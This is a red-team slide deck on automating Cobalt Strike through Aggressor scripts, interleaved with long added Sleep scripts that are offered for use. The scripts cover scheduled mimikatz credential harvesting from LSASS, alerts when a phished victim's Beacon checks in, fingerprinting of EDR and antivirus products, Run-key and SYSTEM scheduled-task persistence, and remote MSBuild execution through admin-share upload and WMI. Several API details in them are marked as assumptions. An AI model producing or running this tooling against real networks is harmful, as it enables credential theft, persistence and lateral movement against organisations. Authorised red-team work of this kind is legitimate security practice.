▸ beacon_initial_empty – fires when the team server receives a DNS Beacon check-in with no metadata yet
▸ One of the first things people do is type “checkin” and/or set the “mode”
▹ Save yourself the step!
18
https://lh4.googleusercontent.com/TJdG-5-4YzBK9MuoaiNqO5k1gaCRtBZ181KXNb1pvLZbWTj6N1Hi-T9GcHWuwOIQNpvekw0swJ0D-mTouZMb4h0mYyNe0GRFqRuF-SwfM42u7n5TPLi0cuwsENqPB4zVSa0ioprJ
Aggressor Events
▸ Events expose access to different objects depending on the event
▹ beacon_initial – provides a handle ($1, the Beacon ID) for the individual Beacon checking in
▹ This is how you can have an individual Beacon perform an action
▹ heartbeat_* – exposes nothing, but you can call beacons() to iterate over all Beacons
▹ This gives you access to each of them
19
Aggressor Events
▸ There are a large number of events that you can use to trigger your code
▸ Events are documented here: https://www.cobaltstrike.com/aggressor-script/events.html
▸ You can’t add new triggers of your own to the team server
▹ The set of events Cobalt Strike fires isn’t user-expandable
▸ However, you can always ask if you can think of a useful trigger
20
Aggressor Functions
▸ Functions are the “code” associated with your Aggressor script
▸ Functions dictate the actions that you will perform once your trigger is activated
▸ Your code isn’t limited to what you see listed on the Aggressor function page
▸ Aggressor is based on Sleep, right?
▸ Your code will likely be a combination of Aggressor functions and Sleep built-ins
21
Aggressor Functions
▸ Functions include essentially every action that you can conduct within Beacon
▹ bpowershell_import – imports a PowerShell script into a Beacon
▹ bps – performs a process listing on the targeted Beacon
▹ blogonpasswords – runs the mimikatz logonpasswords command
▹ bls – lists the files in a specific directory
▹ bsetenv – sets an environment variable on the current Beacon
22
Aggressor Functions
▸ It also includes “metafunctions” (Sleep predicates) which return results based on Beacon metadata
▹ -is64 – returns true if the Beacon is running in an x64 process
▹ -isadmin – returns true if the Beacon is running with admin rights
▹ -isssh – returns true if the active session is an SSH session
23
Aggressor Functions
▸ You also have the ability to interact with Cobalt Strike itself (rather than Beacon) and manipulate data through Aggressor
▹ gzip – gzip a string
▹ base64_decode – Base64 decode a string
▹ openFileBrowser – opens the file browser interface for a Beacon
▹ openScreenshotBrowser – opens the screenshot tab
▹ str_encode – encodes a string in the specified encoding format
24
Aggressor Sample
▸ Let’s piece some of this together in a sample scenario
▸ You’ve compromised a Windows jump-box used by admins/users
▸ You were able to escalate privileges
▸ You’re interested in capturing passwords from users regularly logging in to the system
▸ How can Aggressor help?
25
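The jump-box scenario above, worked as an added example (this is not code from the talk or from the AggressorAssessor repo): the operator opts a Beacon in with a `harvest` alias, and a `heartbeat_10m` handler walks `beacons()` and runs `logonpasswords` against tagged, still-elevated Beacons on a schedule. The `harvest` command name, the 30-minute spacing, the 5-minute recent-check-in window, and the use of the `last` key of `beacons()` (milliseconds since the last check-in) are assumptions made for this example; `alias`, `bnote`, `binfo`, `blog`, `berror`, `blogonpasswords`, `beacon_command_register` and `-isadmin` are standard Aggressor.

```sleep
# Added example (not the talk's code): scheduled credential harvesting on a
# compromised jump-box. Assumes Cobalt Strike 3.x Aggressor built-ins and that
# beacons() entries carry 'id', 'note' and 'last' (ms since check-in) keys.

%harvest_last     = %();             # bid -> ticks() of the last mimikatz run
$HARVEST_INTERVAL = 30 * 60 * 1000;  # assumption: at most one run per 30 min
$RECENT_CHECKIN   = 5  * 60 * 1000;  # assumption: only task Beacons seen in 5 min

# Operator opt-in: "harvest" marks this Beacon, "harvest off" clears the mark.
alias harvest {
    if ($2 eq "off") {
        bnote($1, "");
        blog($1, "credential harvesting disabled");
        return;
    }
    # Protection mechanism: refuse to arm a session that can't read LSASS anyway.
    if (!-isadmin $1) {
        berror($1, "logonpasswords needs admin rights; escalate first");
        return;
    }
    bnote($1, "harvest");
    blog($1, "credential harvesting enabled, every " . ($HARVEST_INTERVAL / 60000) . " min");
}

beacon_command_register("harvest", "Toggle scheduled logonpasswords on this Beacon",
    "Usage: harvest [off]\n\nSets the Beacon note to 'harvest'. A heartbeat handler then runs\nmimikatz logonpasswords against it periodically while it stays elevated.");

# heartbeat_* exposes no Beacon handle, so iterate the data model ourselves.
on heartbeat_10m {
    foreach $b (beacons()) {
        $bid = $b['id'];

        if ($b['note'] ne "harvest") { continue; }            # not opted in
        if ($b['last'] > $RECENT_CHECKIN) { continue; }       # asleep or dead
        if (($bid in %harvest_last) && (ticks() - %harvest_last[$bid] < $HARVEST_INTERVAL)) {
            continue;                                         # ran recently
        }
        # Re-check rights every time: a uniform process, not a one-off check.
        if (!-isadmin $bid) {
            blog($bid, "no longer admin; skipping scheduled harvest");
            continue;
        }

        %harvest_last[$bid] = ticks();
        blog($bid, "scheduled harvest: running logonpasswords");
        blogonpasswords($bid);   # parsed creds land in View -> Credentials
    }
}
```

Each `logonpasswords` run injects into LSASS, so the interval is the knob that trades coverage of short-lived logons against noise on the host; the `bnote` tag doubles as a visual reminder in the Beacon table of which sessions are armed.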
Applied Automation – A Phishing Tale
What steps can leverage automation?
34
A Phishing Tale
▸ What’s likely the most prevalent method of gaining access into an environment?
▸ Phishing!
▸ This is a time intensive process
▹ Generally requires developing a scenario for your customer
▹ Writing custom malware for your customer and scenario
▹ Developing domain reputation
▹ Etc.
35
http://2.bp.blogspot.com/_3zyldbmlRcQ/SFHr8lUkWpI/AAAAAAAAACg/KOLMVHuSY-g/s320/_40998639_net_phishingcartoon203.gif
A Phishing Tale
▸ Eventually, you’ve fired your first salvo and have started phishing
▸ If you’re lucky, your first target opens your e-mail and runs your malware
▸ However, this isn’t always the case
▹ It might take a few people
▹ If you’re sending every 15-30 minutes, time adds up
▸ What if you go grab a drink, are watching a different screen, etc.?
▹ Do you see your incoming Beacon?
36
https://i.pinimg.com/736x/7a/23/fb/7a23fb0506b89f26b01734d6f2ca499d--cartoons.jpg
A Phishing Tale
▸ One of the worst feelings can be coming back to your system and seeing you missed a callback
▸ It’s also great to know right when your Beacon arrives
▸ Aggressor can help
▹ Let’s look into the correct trigger
▹ There’s publicly available code that sends text messages via e-mail
▹ Sleep can let us run an existing script
37
https://i.pinimg.com/736x/82/dc/f8/82dcf869638e2e912822cb51aafdc3bb--stupid-stuff-nerd-stuff.jpg
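The callback alert described here, together with the DNS first-check-in tip from the events section (slide 18), as an added example that is not the talk's code: `beacon_initial_empty` gets the empty DNS check-in out of the way, and `beacon_initial` builds a message from the Beacon metadata and hands it to an external script with Sleep's `exec()`. The notification script `/opt/notify.sh` is hypothetical (stand in your own mail-to-SMS sender); its path, the one-page-per-host rule, and the `dns-txt` mode choice are assumptions made here.

```sleep
# Added example (not the talk's code): page the operator when a phished user's
# Beacon arrives. Assumes Aggressor's beacon_initial, beacon_initial_empty,
# bcheckin, bmode, binfo, elog and Sleep's exec/readAll/closef.

$NOTIFY_SCRIPT = "/opt/notify.sh";   # hypothetical: takes the message as argv[1]
%notified      = %();                # computers we have already paged about

# Slide 18: a DNS Beacon's first check-in carries no metadata. Task it to check
# in and use TXT records so the normal beacon_initial event fires next.
on beacon_initial_empty {
    bcheckin($1);
    bmode($1, "dns-txt");
}

on beacon_initial {
    $user     = binfo($1, "user");
    $computer = binfo($1, "computer");
    $external = binfo($1, "external");
    $internal = binfo($1, "internal");
    $pid      = binfo($1, "pid");

    # One page per host: a second Beacon from the same box is not a new phish.
    if ($computer in %notified) {
        elog("another Beacon on already-notified host " . $computer . " as " . $user);
        return;
    }
    %notified[$computer] = ticks();

    $msg = "New Beacon: " . $user . " on " . $computer . " (pid " . $pid . ")"
         . " ext " . $external . " int " . $internal;
    elog($msg);

    # Array form of exec(): the message is one argv element, so a hostile
    # hostname or username from the target can't break out into a shell.
    $handle = exec(@($NOTIFY_SCRIPT, $msg));
    @out = readAll($handle);
    closef($handle);
    if (size(@out) > 0) {
        elog("notify: " . join(" ", @out));
    }
}
```

`exec()` runs on whatever machine is running this script, the Cobalt Strike client or a headless `agscript` connection, not on the team server, so that is where the notification script and its mail credentials have to live.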
Identifying EDR
▸ Now that we’ve been alerted to our Beacon, we might want to recon the host
▸ What sort of data are we interested in?
▹ Sky’s the limit
▹ Network connections/interfaces
▹ Mapped drives
▹ Local admin rights
▹ Etc.
▸ What about endpoint protection software/defenses and their settings?
49
Identifying EDR
▸ Most EDR products install minifilter drivers (.sys files)
▸ Installed to %SystemRoot%\System32\drivers or %SystemRoot%\System32\DriverStore\FileRepository
▹ Minifilter altitudes are allocated by Microsoft and are publicly listed
▹ https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes
▹ This document associates minifilter driver file names with vendor names
50
Identifying EDR
▸ Why is this important and how can we use this?
▹ If the EDR product is not using the cloud based option we can identify the minifilter driver and match it to the company name
▹ This process can be automated using Aggressor
▹ Gives red teamers awareness of what they are up against before executing commands
▸ How can this be automated?
▹ Cobalt Strike’s Beacon has a built-in ‘ls’ command we can use
▹ The built-in ‘ls’ command uses Win32 APIs to list a directory, which is stealthier than spawning cmd.exe (dir) or PowerShell
51
Identifying EDR
▸ Does the built-in ‘ls’ command have documentation?
▹ https://www.cobaltstrike.com/aggressor-script/functions.html#bls
52
Identifying EDR
▸ List the driver directories and parse the results with conditional statements to determine what EDR is present
▹ Define a static array of .sys files
▹ Store the ‘ls’ results (delivered to the bls callback) in an array
▹ Parse the results array and do exact matching to determine the proper vendor information
▹ Profit
▸ We can also identify other AV products and admin tools present using the ‘ps’ built-in Beacon command and matching on the process name
53
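The driver and process checks from the last three slides, as one added example (not the talk's or the AggressorAssessor code): `bls` lists `System32\drivers` into a callback, each line's last tab-separated field is looked up in a driver-to-vendor table, and `bps` output is matched against known process names. Assumptions made here: the callback forms `bls($bid, $folder, &cb)` and `bps($bid, &cb)` (Cobalt Strike 3.11 and later), which call back with `$1` = bid and `$2` = the raw result text; the tab-separated layout of each `ls` line with the file name last; and the vendor tables, which are short and illustrative. Extend the driver names from the Microsoft allocated-altitudes list before relying on them.

```sleep
# Added example (not the talk's code): fingerprint EDR/AV on a Beacon from
# minifilter driver files and running process names. Vendor tables are
# illustrative; verify and extend them from the allocated-altitudes list.

%edr_drivers = %(
    "wdfilter.sys"        => "Windows Defender (WdFilter)",
    "csagent.sys"         => "CrowdStrike Falcon",
    "sentinelmonitor.sys" => "SentinelOne",
    "sysmondrv.sys"       => "Sysinternals Sysmon"
);

%edr_processes = %(
    "msmpeng.exe"         => "Windows Defender",
    "csfalconservice.exe" => "CrowdStrike Falcon",
    "sentinelagent.exe"   => "SentinelOne",
    "sysmon.exe"          => "Sysinternals Sysmon",
    "sysmon64.exe"        => "Sysinternals Sysmon"
);

# Parse bls output: the file name is the last tab-separated field of each
# line (assumption about the listing format); match it case-insensitively.
sub edr_from_listing {
    local('@hits $line @cols $name');
    @hits = @();
    foreach $line (split("\r?\n", $2)) {
        @cols = split("\t", $line);
        if (size(@cols) < 2) { continue; }          # folder header / blank line
        $name = lc(@cols[size(@cols) - 1]);
        if ($name in %edr_drivers) {
            push(@hits, %edr_drivers[$name] . " [" . $name . "]");
        }
    }
    return @hits;
}

sub on_drivers_listed {
    local('@hits');
    @hits = edr_from_listing($1, $2);
    if (size(@hits) == 0) {
        blog($1, "EDR check (drivers): no known minifilter drivers found");
    } else {
        blog($1, "EDR check (drivers): " . join(", ", @hits));
        bnote($1, "EDR: " . join("; ", @hits));   # visible in the Beacon table
    }
}

# Process names: a substring match over the whole ps result works no matter
# which column Beacon puts the image name in.
sub on_processes_listed {
    local('@hits $lower $proc');
    @hits  = @();
    $lower = lc($2);
    foreach $proc (keys(%edr_processes)) {
        if ($proc isin $lower) { push(@hits, %edr_processes[$proc] . " [" . $proc . "]"); }
    }
    blog($1, "EDR check (processes): " . iff(size(@hits) > 0, join(", ", @hits), "none recognized"));
}

sub edr_check {
    # Beacon's ls and ps use Win32 APIs directly: no cmd.exe or powershell.exe.
    bls($1, "C:\\Windows\\System32\\drivers", &on_drivers_listed);
    bps($1, &on_processes_listed);
}

alias edr_check { edr_check($1); }
beacon_command_register("edr_check", "Fingerprint EDR/AV from drivers and processes",
    "Usage: edr_check\n\nLists System32\\drivers and the process table and matches known\nminifilter driver and process names to vendors.");

# Run it on every new Windows session before anything noisier is tasked.
on beacon_initial {
    if (!-isssh $1) { edr_check($1); }
}
```

The two callbacks are independent, so either signal alone annotates the Beacon; a driver hit with no matching process (or the reverse) is itself worth a look, since it usually means a tamper-protected service name you have not catalogued yet.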
Applied Automation – Persistence
What steps can leverage automation?
60
Persisting
▸ We’ve found minimal EDR software, or exclusions which we can exploit to maintain access
▸ Persistence might be the next step we want to take (depending on previous results)
▸ Fully automating persistence is something we hesitate to do
▸ Let’s have this be a combination of manual analysis and Aggressor
61
Persisting
▸ There are a couple of different ways to persist depending on the level of access
▹ Registry key
▹ Scheduled task
▹ WMI persistence
▸ Rather than doing this all from the command line, let’s generate a pop-up for ease of use!
62
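The pop-up approach, as an added example that is not the talk's code: a `beacon_bottom` menu item opens a dialog for the method, name and payload path, and the button callback builds the command and refuses the SYSTEM scheduled task when the Beacon is not elevated, which is the "protection mechanism" idea from the automation slides. The method labels, default key/task name, default payload path and the two command lines are choices made for this example; `popup`, `dialog`, `drow_combobox`, `drow_text`, `dbutton_action`, `dialog_show`, `bshell`, `berror` and `-isadmin` are standard Aggressor.

```sleep
# Added example (not the talk's code): right-click -> Persist... dialog that
# validates input and gates machine-level persistence on admin rights.

@PERSIST_METHODS = @("HKCU Run key (user)", "Scheduled task at logon (SYSTEM, needs admin)");

# Dialog button callback: $1 = dialog, $2 = button label, $3 = %values
# (%values contains the rows plus whatever defaults we passed, here 'bid').
sub persist_go {
    local('$bid $method $name $path $cmd');
    $bid    = $3['bid'];
    $method = $3['method'];
    $name   = $3['name'];
    $path   = $3['path'];

    if (($name eq "") || ($path eq "")) {
        berror($bid, "a key/task name and a payload path are both required");
        return;
    }

    if ($method eq @PERSIST_METHODS[0]) {
        # Per-user Run key: works at any integrity level, for this user only.
        $cmd = 'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "' . $name
             . '" /t REG_SZ /d "' . $path . '" /f';
    }
    else {
        # SYSTEM task at logon: refuse unless this Beacon is elevated.
        if (!-isadmin $bid) {
            berror($bid, "a SYSTEM task needs an elevated Beacon; use the Run key or escalate first");
            return;
        }
        $cmd = 'schtasks /create /f /tn "' . $name . '" /tr "' . $path . '" /sc onlogon /ru SYSTEM';
    }

    blog($bid, "persistence via " . $method . ": " . $cmd);
    bshell($bid, $cmd);
}

sub persist_dialog {
    local('$dialog');
    # Defaults are placeholders for the operator to overwrite (assumptions).
    $dialog = dialog("Persist on " . binfo($1, "computer"),
                     %(bid => $1, name => "WindowsUpdateCheck", path => "C:\\Users\\Public\\update.exe"),
                     &persist_go);
    drow_combobox($dialog, "method", "Method:", @PERSIST_METHODS);
    drow_text($dialog, "name", "Key / task name:");
    drow_text($dialog, "path", "Payload path on target:");
    dbutton_action($dialog, "Persist");
    dialog_show($dialog);
}

popup beacon_bottom {
    item "Persist..." {
        foreach $bid ($1) { persist_dialog($bid); }   # $1 = selected Beacon IDs
    }
}
```

`bshell` spawns cmd.exe for each command, which contradicts the stealth argument made for Beacon's built-in `ls`; if that matters on the host in question, the same two commands can be issued through `bpowerpick` instead, and the dialog and gating logic stay unchanged.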
Generating Payloads
▸ Payload generation is another crucial step in red team engagements and is used for many different reasons
▹ Initial access
▹ Lateral movement
▹ Persistence
▹ Obfuscation/encoding/AWL bypass
▸ Beneficial for the blue team as well!
▹ Signature based identifiers/IOCs
▹ Test detection capabilities
▹ Payload sizes/types
79
Generating Payloads
▸ What types of payloads can we generate?
▹ HTTP
▹ HTTPS
▹ SMB
▹ DNS
▸ How do they work and how are they generated?
▹ Staged vs stageless (S)
▹ Based off listener information, Malleable C2 profile, architecture selection (x64/x86)
▹ Attacks -> Packages menu options
80
Generating Payloads
▸ How can we automate payload generation using Aggressor?
▹ Utilize the dialog API with drow_listener
▹ artifact/artifact_stageless functions
81
https://www.cobaltstrike.com/aggressor-script/functions.html#dialog
Lateral Movement
▸ Lateral movement is a vital part of every engagement and can be approached in different ways
▹ What value can we add if we show successful pivoting inside a network?
▹ 9 times out of 10 we need to move laterally to accomplish our objectives
▸ Can we automate this methodology?
▹ How can we use Aggressor scripts to enhance lateral movement?
88
Lateral Movement
▸ Built-in methods of lateral movement inside of Beacon
▹ wmi
▹ psexec/psexec_psh
▹ winrm
▸ psexec_psh, winrm and wmi invoke a PowerShell one-liner based on the listener selection; psexec drops a service executable instead
▹ Good for quick and easy lateral movement
▹ Bad for staying stealthy and avoiding the use of PowerShell/PsExec
89
Lateral Movement
▸ Let’s use Aggressor to build out a newer technique of lateral movement
▸ Focus on using unmanaged PowerShell with MSBuild
▸ Set global variables to help generate the XML file
▸ Functions that we need to utilize:
▹ alias
▹ beacon_command_register
▹ bupload_raw
▹ bpowerpick
▹ exec
90
Lateral Movement
▸ Building out our alias commands with beacon_command_register
▹ remote_msbuild_script
▹ remote_msbuild_cmd
92
Lateral Movement
▸ Let’s run through the other alias command (remote_msbuild_cmd) and use similar code with minor differences
99
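The `remote_msbuild_script` alias shape described in slides 90 to 99, as an added example that is not the talk's code: the alias reads an operator-built MSBuild project file from the client, drops it on the target through the admin share with `bupload_raw`, and starts `MSBuild.exe` on it with `Invoke-WmiMethod` run through `bpowerpick`. The inline-task XML itself is not generated here; you supply the file. Assumptions made in this example: the `C:\Windows\Temp` drop folder, the x64 .NET 4 MSBuild path, the default `build.xml` name, and the `bupload_raw($bid, $remotePath, $content)` argument order; `alias`, `beacon_command_register`, `bupload_raw`, `bpowerpick`, `berror`, `blog` and Sleep's `openf`/`readb`/`closef`/`-exists` are standard.

```sleep
# Added example (not the talk's code): upload an MSBuild project over SMB and
# execute it remotely via WMI from inside a Beacon, without psexec or a
# PowerShell one-liner download cradle.

$MSBUILD = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe"; # assumption: x64 .NET 4
$DROPDIR = "C:\\Windows\\Temp";                                               # assumption: drop folder

sub read_local_file {
    local('$handle $data');
    $handle = openf($1);
    $data   = readb($handle, -1);   # -1: read the whole file as bytes
    closef($handle);
    return $data;
}

# Usage: remote_msbuild_script <target> <local .xml> [remote name]
alias remote_msbuild_script {
    local('$target $local $remote $xml $unc $ps');
    ($target, $local, $remote) = @($2, $3, $4);

    if (($target eq "") || ($local eq "")) {
        berror($1, "usage: remote_msbuild_script <target> <local .xml> [remote name]");
        return;
    }
    if (!-exists $local) {
        berror($1, "local file not found: " . $local);
        return;
    }
    if ($remote eq "") { $remote = "build.xml"; }        # assumption: default name
    if ("*.xml" !iswm $remote) { $remote = $remote . ".xml"; }

    $xml = read_local_file($local);

    # 1. Drop the project file via the admin share, using Beacon's current token.
    #    UNC path: \\target\C$\Windows\Temp\<name>  ('$' kept literal on purpose)
    $unc = "\\\\" . $target . "\\C" . '$' . "\\Windows\\Temp\\" . $remote;
    bupload_raw($1, $unc, $xml);

    # 2. Start MSBuild on the target through WMI (Win32_Process.Create).
    #    powerpick keeps powershell.exe out of the process tree on our host.
    $ps = 'Invoke-WmiMethod -ComputerName ' . $target . ' -Class Win32_Process -Name Create'
        . ' -ArgumentList "' . $MSBUILD . ' ' . $DROPDIR . "\\" . $remote . '"';
    blog($1, "remote msbuild on " . $target . ": " . $DROPDIR . "\\" . $remote);
    bpowerpick($1, $ps);
}

beacon_command_register("remote_msbuild_script", "Run an MSBuild project on a remote host via SMB + WMI",
    "Usage: remote_msbuild_script <target> <local .xml> [remote name]\n\nUploads the XML to the target's admin share (Windows\\Temp) and starts\nMSBuild.exe on it with Invoke-WmiMethod.");
```

Two caveats for anyone adapting this: the upload and the WMI call both ride on the Beacon's current token, so `make_token` or `steal_token` first if the session is not a domain admin on the target, and the dropped XML stays in `Windows\Temp` until you remove it, which is exactly the kind of artifact the reporting step should record.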
Reporting
▸ Reporting is part of every assessment and it should be done right
▹ What value are we if we can hack our customers but can’t convey what we did, risk, remediations, etc.?
▸ There are steps you can take to make reporting more efficient
▹ Develop approved finding language
▹ Develop reporting templates
▹ Automate generating commonly requested information
104
Reporting
▸ Let’s tackle that last bullet point
▹ Automate generating commonly requested information
▸ What’s something that our customers ALWAYS ask?
▹ What computers were compromised?
▹ What accounts were compromised?
▸ Let’s create a report generating function which captures this information!
105
https://vignette.wikia.nocookie.net/cryptidz/images/c/c6/Why_Not_Zoidberg.jpg/revision/latest?cb=20160219063637
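The report function for those two questions, as an added example that is not the talk's code: a script-console `command` walks `beacons()` for compromised hosts (one row per computer, with every account the Beacons ran as) and `credentials()` for compromised accounts (deduplicated by realm and user, with where each was seen), and writes a tab-separated text file. Assumed here: the dictionary keys `computer`, `user`, `internal`, `os`, `ver` on `beacons()` entries and `realm`, `user`, `host`, `source` on `credentials()` entries, and the default file name `compromise_report.txt`; `command`, `beacons()`, `credentials()` and Sleep's `openf`/`println`/`closef`/`formatDate` are standard.

```sleep
# Added example (not the talk's code): "which computers and which accounts"
# pulled from the team server data model into a report file.

sub compromised_hosts {
    local('%hosts $b $key');
    %hosts = %();
    foreach $b (beacons()) {
        $key = lc($b['computer']);
        if ($key eq "") { continue; }        # empty DNS check-ins carry no metadata
        if ($key !in %hosts) {
            %hosts[$key] = %(computer => $b['computer'],
                             internal => $b['internal'],
                             os       => $b['os'] . " " . $b['ver'],
                             users    => %());
        }
        %hosts[$key]['users'][$b['user']] = 1;   # every account we ran as on it
    }
    return %hosts;
}

sub compromised_accounts {
    local('%accts $c $key');
    %accts = %();
    foreach $c (credentials()) {
        # realm\user, deduplicated: the same account often comes from many hosts
        $key = lc($c['realm'] . "\\" . $c['user']);
        if ($key !in %accts) { %accts[$key] = %(); }
        %accts[$key][$c['host'] . " (" . $c['source'] . ")"] = 1;
    }
    return %accts;
}

# Script console: compromise_report [file]   (assumption: default file name)
command compromise_report {
    local('$file $out %hosts %accts $k $h');
    $file  = iff($1 ne "", $1, "compromise_report.txt");
    %hosts = compromised_hosts();
    %accts = compromised_accounts();

    $out = openf(">" . $file);
    println($out, "Compromise summary generated " . formatDate("yyyy-MM-dd HH:mm:ss"));
    println($out, "\nCompromised hosts (" . size(%hosts) . "):");
    foreach $k (sorta(keys(%hosts))) {
        $h = %hosts[$k];
        println($out, "  " . $h['computer'] . "\t" . $h['internal'] . "\t" . $h['os']
                    . "\tran as: " . join(", ", sorta(keys($h['users']))));
    }
    println($out, "\nCompromised accounts (" . size(%accts) . "):");
    foreach $k (sorta(keys(%accts))) {
        println($out, "  " . $k . "\tseen on: " . join(", ", sorta(keys(%accts[$k]))));
    }
    closef($out);
    println("wrote " . $file . ": " . size(%hosts) . " hosts, " . size(%accts) . " accounts");
}
```

`beacons()` only covers sessions the team server still knows about, so run this before clearing dead Beacons at the end of the engagement, or have it append on a heartbeat during the assessment so hosts that only ever called back once still make the list.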
Where to get this?
▸ We just covered a lot of different code
▸ Aggregate everything within a central repo
▹ This is not all our code
▹ It’s some of the scripts we use the most in one area
▸ https://github.com/FortyNorthSecurity/AggressorAssessor
▹ Get all of the code here!
109
Thanks!
@ChrisTruncer
▹ https://www.fortynorthsecurity.com
@r3dQu1nn
▹ https://github.com/harleyQu1nn/AggressorScripts
110